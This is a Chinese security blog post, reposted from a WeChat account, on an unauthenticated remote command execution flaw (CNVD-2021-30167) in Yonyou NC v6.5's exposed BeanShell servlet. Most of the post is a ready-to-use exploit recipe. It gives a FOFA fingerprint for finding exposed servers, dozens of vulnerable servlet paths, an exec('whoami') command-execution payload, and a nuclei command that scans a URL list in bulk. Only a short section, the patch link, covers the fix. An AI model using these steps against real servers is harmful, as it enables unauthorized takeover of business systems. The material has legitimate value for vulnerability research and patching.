(CNVD-2021-30167)用友nc v6.5 远程命令执行漏洞

admin 2022年9月16日00:38:16评论486 views字数 3281阅读10分56秒阅读模式
(CNVD-2021-30167)用友nc v6.5 远程命令执行漏洞
文章声明

安全文章技术仅供参考,此文所提供的信息为漏洞靶场进行渗透,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。
本文所提供的工具仅用于学习,禁止用于其他,未经授权,严禁转载,如需转载私信联系。



(CNVD-2021-30167)用友nc v6.5 远程命令执行漏洞


漏洞简介


该漏洞为远程命令执行漏洞,由于用友NC对外开放了BeanShell接口,攻击者可以在无需经过身份验证的情况下直接访问该接口,并构造恶意数据执行任意命令,攻击成功可获得目标服务器权限。



漏洞影响


用友nc v6.5
fofa:icon_hash="1085941792"


漏洞复现


可用的BshServlet地址

https://url/service/~aim/bsh.servlet.BshServlethttps://url/service/~alm/bsh.servlet.BshServlethttps://url/service/~ampub/bsh.servlet.BshServlethttps://url/service/~arap/bsh.servlet.BshServlethttps://url/service/~aum/bsh.servlet.BshServlethttps://url/service/~cc/bsh.servlet.BshServlethttps://url/service/~cdm/bsh.servlet.BshServlethttps://url/service/~cmp/bsh.servlet.BshServlethttps://url/service/~ct/bsh.servlet.BshServlethttps://url/service/~dm/bsh.servlet.BshServlethttps://url/service/~erm/bsh.servlet.BshServlethttps://url/service/~fa/bsh.servlet.BshServlethttps://url/service/~fac/bsh.servlet.BshServlethttps://url/service/~fbm/bsh.servlet.BshServlethttps://url/service/~ff/bsh.servlet.BshServlethttps://url/service/~fip/bsh.servlet.BshServlethttps://url/service/~fipub/bsh.servlet.BshServlethttps://url/service/~fp/bsh.servlet.BshServlethttps://url/service/~fts/bsh.servlet.BshServlethttps://url/service/~fvm/bsh.servlet.BshServlethttps://url/service/~gl/bsh.servlet.BshServlethttps://url/service/~hrhi/bsh.servlet.BshServlethttps://url/service/~hrjf/bsh.servlet.BshServlethttps://url/service/~hrpd/bsh.servlet.BshServlethttps://url/service/~hrpub/bsh.servlet.BshServlethttps://url/service/~hrtrn/bsh.servlet.BshServlethttps://url/service/~hrwa/bsh.servlet.BshServlethttps://url/service/~ia/bsh.servlet.BshServlethttps://url/service/~ic/bsh.servlet.BshServlethttps://url/service/~iufo/bsh.servlet.BshServlethttps://url/service/~modules/bsh.servlet.BshServlethttps://url/service/~mpp/bsh.servlet.BshServlethttps://url/service/~obm/bsh.servlet.BshServlethttps://url/service/~pu/bsh.servlet.BshServlethttps://url/service/~qc/bsh.servlet.BshServlethttps://url/service/~sc/bsh.servlet.BshServlethttps://url/service/~scmpub/bsh.servlet.BshServlethttps://url/service/~so/bsh.servlet.BshServlethttps://url/service/~so2/bsh.servlet.BshServlethttps://url/service/~so3/bsh.servlet.BshServlethttps://url/service/~so4/bsh.servlet.BshServlethttps://url/service/~so5/bsh.servlet.BshServlethttps://url/service/~so6/bsh.servlet.BshServlethttps://url/service/~tam/bsh.servlet.BshServlethttps://url/service/~tbb/bsh.servlet.BshServlethttps://url/service/~to/bsh.servlet.BshServlethttps://url/service/~uap/bsh.servlet.BshServlethttps://url/service/~uapbd/bsh.servlet.BshServlethttps://url/service/~uapde/bsh.servlet.BshServlethttps://url/service/~uapeai/bsh.servlet.BshServlethttps://url/service/~uapother/bsh.servlet.BshServlethttps://url/service/~uapqe/bsh.servlet.BshServlethttps://url/service/~uapweb/bsh.servlet.BshServlethttps://url/service/~uapws/bsh.servlet.BshServlethttps://url/service/~vrm/bsh.servlet.BshServlethttps://url/service/~yer/bsh.servlet.BshServlet
访问用友nc产品地址,并添加漏洞链接, 在指定地方传参,从而造成远程命令执行。
http://url/servlet/~ic/bsh.servlet.BshServlet


(CNVD-2021-30167)用友nc v6.5 远程命令执行漏洞



输入exec"whoami"点击按钮进行测试,发现命令执行成功

(CNVD-2021-30167)用友nc v6.5 远程命令执行漏洞



nuclei-pocs

nuclei -t yonyou_NC_bsh_servlet_BshServlet.yaml -l url.txt

公众号回复0915获取

(CNVD-2021-30167)用友nc v6.5 远程命令执行漏洞




漏洞修复


厂商已提供漏洞修补方案,补丁下载地址:http://umc.yonyou.com/ump/querypatchdetailedmng?PK=18981c7af483007db179a236016f594d37c01f22aa5f5d19





原文始发于微信公众号(北极星sec):(CNVD-2021-30167)用友nc v6.5 远程命令执行漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年9月16日00:38:16
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   (CNVD-2021-30167)用友nc v6.5 远程命令执行漏洞http://cn-sec.com/archives/1297476.html

发表评论

匿名网友 填写信息